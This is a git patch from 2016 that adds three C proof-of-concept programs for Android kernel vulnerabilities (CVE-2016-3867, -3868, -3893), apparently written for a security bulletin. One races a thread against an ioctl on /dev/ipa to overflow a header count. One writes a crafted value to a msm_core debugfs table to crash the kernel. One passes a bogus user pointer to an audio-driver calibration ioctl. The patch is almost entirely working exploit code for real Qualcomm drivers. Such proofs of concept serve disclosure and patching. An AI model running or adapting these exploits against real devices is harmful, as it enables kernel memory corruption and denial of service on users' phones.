From 6857da8b9f543a5ee403959b89fe2f6e85639041 Mon Sep 17 00:00:00 2001
From: Scott Bauer <sbauer@plzdonthack.me>
Date: Fri, 9 Sep 2016 21:35:11 -0600
Subject: [PATCH] bugs for sept bulletin

Signed-off-by: Scott Bauer <sbauer@plzdonthack.me>
---
 CVE-2016-3867.c | 118 ++++++++++++++++++++++++++++++++++++++++++++++++
 CVE-2016-3868.c |  22 +++++++++
 CVE-2016-3893.c |  58 ++++++++++++++++++++++++
 3 files changed, 198 insertions(+)
 create mode 100644 CVE-2016-3867.c
 create mode 100644 CVE-2016-3868.c
 create mode 100644 CVE-2016-3893.c

diff --git a/CVE-2016-3867.c b/CVE-2016-3867.c
new file mode 100644
index 0000000..646f2ca
--- /dev/null
+++ b/CVE-2016-3867.c
@@ -0,0 +1,118 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdbool.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <net/if.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <pthread.h>
+
+static const char *dev = "/dev/ipa";
+
+#define IPA_RESOURCE_NAME_MAX 32
+#define IPA_HDR_MAX_SIZE 64
+#define IPA_IOCTL_ADD_HDR            0
+#define IPA_IOCTL_DEL_HDR            1
+
+enum ipa_hdr_l2_type {
+        IPA_HDR_L2_NONE,
+        IPA_HDR_L2_ETHERNET_II,
+        IPA_HDR_L2_802_3,
+        IPA_HDR_L2_MAX,
+};
+
+struct ipa_hdr_del {
+        uint32_t hdl;
+        int status;
+};
+
+struct ipa_ioc_del_hdr {
+        uint8_t commit;
+        uint8_t num_hdls;
+        struct ipa_hdr_del hdl[0];
+};
+
+
+struct ipa_hdr_add {
+        char name[IPA_RESOURCE_NAME_MAX];
+        uint8_t hdr[IPA_HDR_MAX_SIZE];
+        uint8_t hdr_len;
+        enum ipa_hdr_l2_type type;
+        uint8_t is_partial;
+        uint32_t hdr_hdl;
+        int status;
+        uint8_t is_eth2_ofst_valid;
+        uint16_t eth2_ofst;
+};
+
+struct ipa_ioc_add_hdr {
+        uint8_t commit;
+        uint8_t num_hdrs;
+        struct ipa_hdr_add hdr[0];
+};
+
+#define IPA_IOC_MAGIC 0xCF
+
+
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, IPA_IOCTL_ADD_HDR,\
+			      struct ipa_ioc_add_hdr *)
+
+
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+			      IPA_IOCTL_DEL_HDR,\
+			      struct ipa_ioc_del_hdr *)
+
+
+
+volatile int trigger = 0;
+volatile int trigger1 = 0;
+static void *size_change(void *hdr)
+{
+	struct ipa_ioc_add_hdr *add_hdr = hdr;
+	static unsigned int stupid_hack = 2000;
+
+	trigger1 = 1;
+	while (trigger == 0) { };
+	usleep(stupid_hack);
+	add_hdr->num_hdrs = 255;
+	stupid_hack++;
+	if (stupid_hack > 3000)
+		stupid_hack = 2000;
+
+	trigger1 = 0;
+	return NULL;
+}
+
+
+int main(void)
+{
+
+	int fd, counter;
+	pthread_t race_car;
+	struct ipa_ioc_add_hdr add_hdr = { 0 };
+
+	fd = open(dev, O_RDWR);
+	if (fd < 0) {
+		printf("Failed to open %s with %s\n", dev, strerror(errno));
+		return EXIT_FAILURE;
+	}
+
+	for (counter = 0; counter < 10000; counter++) {
+		pthread_create(&race_car, NULL, size_change, &add_hdr);
+		while(trigger1 != 1) {}
+		trigger = 1;
+		asm volatile("dmb ishst" : : : "memory");
+		ioctl(fd, IPA_IOC_ADD_HDR, &add_hdr);
+		pthread_join(race_car, NULL);
+		trigger = 0;
+		add_hdr.num_hdrs = 0;
+	}
+
+	return EXIT_FAILURE;
+}
diff --git a/CVE-2016-3868.c b/CVE-2016-3868.c
new file mode 100644
index 0000000..015021a
--- /dev/null
+++ b/CVE-2016-3868.c
@@ -0,0 +1,22 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <errno.h>
+
+static const char *dev = "/sys/kernel/debug/msm_core/ptable";
+static const char *crasher = "1 1 1 1 4702111234474983745";
+int main(void)
+{
+	int fd;
+	fd = open(dev, O_WRONLY);
+	if (fd < 0) {
+		printf("Failed to open %s with %s\n", dev, strerror(errno));
+		return EXIT_FAILURE;
+	}
+	write(fd, crasher, strlen(crasher));
+}
diff --git a/CVE-2016-3893.c b/CVE-2016-3893.c
new file mode 100644
index 0000000..fc28193
--- /dev/null
+++ b/CVE-2016-3893.c
@@ -0,0 +1,58 @@
+/**
+ *
+ * CVE-2016-3893.c
+ * https://code.google.com/p/android/issues/detail?id=213554
+ *
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+enum wcd_cal_type {
+        WCD9XXX_MIN_CAL,
+        WCD9XXX_ANC_CAL = WCD9XXX_MIN_CAL,
+        WCD9XXX_MAD_CAL,
+        WCD9XXX_MBHC_CAL,
+        WCD9XXX_MAX_CAL,
+};
+
+
+struct wcdcal_ioctl_buffer {
+        __u32 size;
+        __u8 __user *buffer;
+        enum wcd_cal_type cal_type;
+};
+
+#define SNDRV_CTL_IOCTL_HWDEP_CAL_TYPE \
+        _IOW('U', 0x1, struct wcdcal_ioctl_buffer)
+
+
+int main(void)
+{
+	int i;
+	const  char *dev = "/dev/snd/hwC0D1000";
+	int fd;
+	struct wcdcal_ioctl_buffer buf = { 0 };
+	buf.size = 0xF;
+	buf.buffer = 0x414100ABADACC355;
+	buf.cal_type = WCD9XXX_MAD_CAL;
+
+	printf("Opening %s\n", dev);
+	fd = open(dev, O_WRONLY);
+	if (fd > 0) {
+		printf("ioctl\n");
+		ioctl(fd, SNDRV_CTL_IOCTL_HWDEP_CAL_TYPE, &buf);
+		printf("strerror %s\n", strerror(errno));
+	}
+	else
+		printf("Error on %s with %s\n", dev, strerror(errno));
+
+	//sleep(1);
+	close(fd);
+}
+